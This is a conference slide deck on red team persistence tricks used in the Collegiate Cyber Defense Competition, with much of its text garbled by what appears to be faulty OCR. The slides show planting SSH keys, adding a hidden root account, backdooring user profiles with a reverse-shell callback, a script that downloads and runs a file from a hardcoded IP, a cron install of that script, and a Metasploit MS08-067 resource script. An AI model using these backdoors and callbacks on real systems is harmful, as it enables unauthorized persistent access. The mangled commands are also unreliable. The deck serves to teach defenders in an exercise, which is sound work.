
Dirty Red Team Tricks
Raphael Mudge
@armitagehacker
Overview
- Collegiate Cyber Defense Competition
- Why I'm giving this talk (digression.)
- Our Process
- The War of Persistence
- Teamwork
Who are you?
- CCDC Participant / Team Mentor
  - Learn how red team thinks
- Red Team Member
  - Pick up a few tricks
- Everyone Else
  - Tell a story: Where do babies come from?
CCDC (www.nationalccdc.org)
- Defense competition for college students
! o users, ,-o servers, web, mull, eLc.
- Identical hardware and software across teams
- Scored on
  - service availability
  - response to injected events
  - and ability to stop the red team..
Why I'm giving this talk…
- I've learned a lot at *CCDC
  - North East CCDC 2008, 2009, 2010, 2011
  - Mid Atlantic CCDC 2011
  - Other Exercises too (but this talk is about *CCDC)
Why I'm giving this talk…
- For the students participating
  - Returning teams ready for past tricks each year
  - Newcomers get eaten up by old tricks
Why I'm giving this talk…
- Common questions
  - How many 0-days did you use?
  - You had a head start, no fair!
  - How did you get in?
Why I'm giving this talk…
- Always a project.
  - Social Engineering Hack 2008
  - Smoke Screen (Fail?!?) 2009
  - Automated UNIX Pwnage 2010 *
  - Armitage for Metasploit 2011 *
Why I'm giving this talk…
- My friends are awesome too
" Cerry's RooLklL (C-SoL)
" 1boss's Clsco lOS 8uckdoor
" Lr. Ruld's cruzy llbcu buckdoor
" 11's Wlndows Pwnuge *
" Cuys wj Musslve LCz Resources
Our Process
Reconnaissance
Reconnaissance
Reconnaissance
Enumeration
! nmu 1
- Nessus Scan
Access
- Today's tools
Access
- Today's tools vs. Student Networks
Video: Post Exploitation
And yet…
- Friday
  - A lot of access
  - Get in to *everything*
- Saturday
  - *Some* access *
  - Attack Web Applications
- Sunday
  - Destroy anything we have access on
* ShouL ouL lnfrusLrucLure Leum 1boss, Luuru, und 1onuLhun
they can't keep you out
War of Persistence
UNIX Ownership…
Add an SSH Key
mkdlr jrooLj.ssh
cuL >>jrooLj.sshjuuLhorlzed_keys
[lnserL my Leum SSH key]
$NN4'=)#55O?'
c jblnjzsh j.kernel
chmod sss j.kernel
Louch -d Muy zoo j.kernel
chuLLr l j.kernel
Add a new user…
echo nobody8:..:zg:o:ggggg:,::: >>jeLcj
shudow
echo nobody8:x:o:o:nobody,,,,:j:jblnjbush >>j
eLcjusswd
Backdoor New Users
[uloud reverse shell cullbuck Lo jusrjblnjufw]
echo jusrjblnjufw 8 >>jeLcjroFle
echo jusrjblnjufw 8 >>jeLcjskelj.roFle
chmod sss jusrjblnjufw
chuLLr l jeLcjskelj.roFle jeLcjroFle jusrjblnj
ufw
Ghetto Callback
#!jblnjbush
exorL UPLA1L_URL=hLL:jjgz.68.zo.,jhelloworld.LxL
lf [ `whlch lynx` ]
Lhen
lynx -source sUPLA1L_URL >jLmj.lnn-luLesL z>jdevjnull
else
lf [ `whlch curl` ]
Lhen
curl sUPLA1L_URL >jLmj.lnn-luLesL z>jdevjnull
else
lf [ `whlch wgeL` ]
Lhen
wgeL sUPLA1L_URL -O jLmj.lnn-luLesL z>jdevjnull
F
F
F
chmod x jLmj.lnn-luLesL
jLmj.lnn-luLesL
rm -f jLmj.lnn-luLesL
Install Callback
[uloud jeLcjcron.hourlyjlnn-cron-rnews]
Louch -d z 1ul o8 jeLcjcron.hourlyjlnn-cron-
rnews
chuLLr l jeLcjcron.dullyjlnn-cron-rnews
Story Time: Shell Party
TJ's Windows Ownership…
hosts.txt
Host: 192.168.95.255 () !Status: Down!
Host: 192.168.95.1 () !Status: Up!
Host: 192.168.95.1 () !Ports: 445/closed/tcp//
microsoft-ds///!
Host: 192.168.95.132 () !Status: Up!
Host: 192.168.95.132 () !Ports: 445/closed/tcp//
microsoft-ds///!
Host: 192.168.95.155 () !Status: Up!
Host: 192.168.95.155 () !Ports: 445/closed/tcp//
microsoft-ds///!
Host: 192.168.95.156 () !Status: Up!
Host: 192.168.95.156 () !Ports: 445/open/tcp//
microsoft-ds///!
Host: 192.168.95.174 () !Status: Up!
Host: 192.168.95.174 () !Ports: 445/open/tcp//
microsoft-ds///!
# Nmap done at Fri Mar 11 02:04:05 2011 -- 256 IP
addresses (5 hosts up) scanned in 2.20 seconds!
fun.rc
setg AutoRunScript persistence -p
192.168.95.155 -r 16819 -i 30 -S -U!
use exploit/windows/smb/ms08_067_netapi!
setg PAYLOAD windows/meterpreter/bind_tcp!
set RHOST 192.168.95.156!
exploit -j!
set RHOST 192.168.95.174!
exploit -j!
Video: MACCDC Opening Salvo
And yet…
Teaming
Collaboration Needs
- Real-time Communication
- Data Sharing
- Session Sharing
Armitage
- A GUI for Metasploit
- Goal: Avoid this.
Session Sharing Solution
Teaming Demonstration
Ideal Teaming Situation
Beyond CCDC
hLL:jjwww.loculnews8.comjvldeojzg6ojlndex.hLml
Summary
- Collegiate Cyber Defense Competition
- Why I'm giving this talk (digression.)
- Our Process
- The War of Persistence
- Teamwork
Greetz
1odd L.
1on Cluudlus
Luuru Cuuy
18oss
Luryl 1ohnson
Ryun Reynolds
Cerry 8runelle
Sllus CuLler
1ubru
Wlll
Curl 1he Shurk
Ceorglu Wledmun
Sum K.
Luve Wllson
MuLL Crueber
1esse vursulone
1e Scuuru
1.1. O'Connor
Lr. Ruld
Ryun SmlLh
1om vuchon
1om 1ufLs
Zuck lusel
Rob Mublx luller
Where to go from here…
Twitter:
@armitagehacker
Armitage:
http://www.fastandeasyhacking.com/
Get the code:
http://www.fastandeasyhacking.com/dirty
Collegiate Cyber Defense Competition:
http://www.nationalccdc.org
